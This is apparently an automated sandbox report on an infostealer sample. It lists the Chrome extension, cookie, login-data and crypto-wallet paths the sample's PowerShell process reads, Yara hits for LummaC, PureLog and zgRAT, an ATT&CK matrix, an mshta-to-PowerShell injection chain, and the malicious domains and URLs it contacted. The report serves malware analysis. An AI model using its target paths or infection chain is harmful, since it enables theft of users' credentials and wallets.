                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 6.2.powershell.exe.d461e90.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.powershell.exe.d461e90.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2813404644.000000000D3E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 6.2.powershell.exe.d461e90.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.powershell.exe.d461e90.2.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		111
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter                    		Boot or Logon Initialization Scripts1
                    DLL Side-Loading                    		21
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    PowerShell                    		Logon Script (Windows)Logon Script (Windows)111
                    Process Injection                    		Security Account Manager21
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares2
                    Data from Local System                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture14
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Software Packing                    		Cached Domain Credentials22
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579343 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 33 solve.fizq.net 2->33 35 locketplyxx.click 2->35 37 2 other IPs or domains 2->37 53 Suricata IDS alerts for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Yara detected PureLog Stealer 2->57 59 7 other signatures 2->59 10 cmd.exe 1 2->10         started        signatures3 process4 process5 12 mshta.exe 17 10->12         started        16 conhost.exe 10->16         started        dnsIp6 43 solve.fizq.net 172.67.131.114, 443, 49732 CLOUDFLARENETUS United States 12->43 45 atsukaa.thrivezest.org 104.21.18.182, 443, 49733 CLOUDFLARENETUS United States 12->45 67 Suspicious powershell command line found 12->67 18 powershell.exe 18 12->18         started        signatures7 process8 signatures9 47 Suspicious powershell command line found 18->47 49 Bypasses PowerShell execution policy 18->49 51 Found suspicious powershell code related to unpacking or dynamic code loading 18->51 21 powershell.exe 15 18 18->21         started        25 conhost.exe 18->25         started        process10 dnsIp11 39 atsuka.thrivezest.org 172.67.183.27, 443, 49737 CLOUDFLARENETUS United States 21->39 61 Injects a PE file into a foreign processes 21->61 27 powershell.exe 21->27         started        31 conhost.exe 21->31         started        signatures12 process13 dnsIp14 41 locketplyxx.click 172.67.151.193, 443, 49820, 49821 CLOUDFLARENETUS United States 27->41 63 Tries to harvest and steal browser information (history, passwords, etc) 27->63 65 Tries to steal Crypto Currency Wallets 27->65 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    No Antivirus matches

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    atsuka.thrivezest.org
                    		172.67.183.27
                    		truetrue
                      		unknown
                      atsukaa.thrivezest.org
                      		104.21.18.182
                      		truefalse
                        		unknown
                        locketplyxx.click
                        		172.67.151.193
                        		truetrue
                          		unknown
                          solve.fizq.net
                          		172.67.131.114
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://solve.fizq.net/awjxs.captchatrue
                              		unknown
                              https://locketplyxx.click/apitrue
                                		unknown
                                https://atsuka.thrivezest.org/hubus.xlmtrue
                                  		unknown
                                  https://atsukaa.thrivezest.org/winwidgetshp.jsonfalse
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://atsukaa.thrivezest.org/winwidgetshp.json$mshta.exe, 00000002.00000003.1693843540.000000000288D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://atsukaa.thrivezest.org/winwidgetshp.jsonLMEMhmshta.exe, 00000002.00000003.1771480219.0000000006022000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1781742973.0000000006024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778187959.0000000006024000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://solve.fizq.net/awjxs.captchaimshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://solve.fizq.net/awjxs.captchadmshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://github.com/mgravell/protobuf-netJpowershell.exe, 00000006.00000002.2728791502.0000000008FA0000.00000004.08000000.00040000.00000000.sdmpfalse
                                              		high
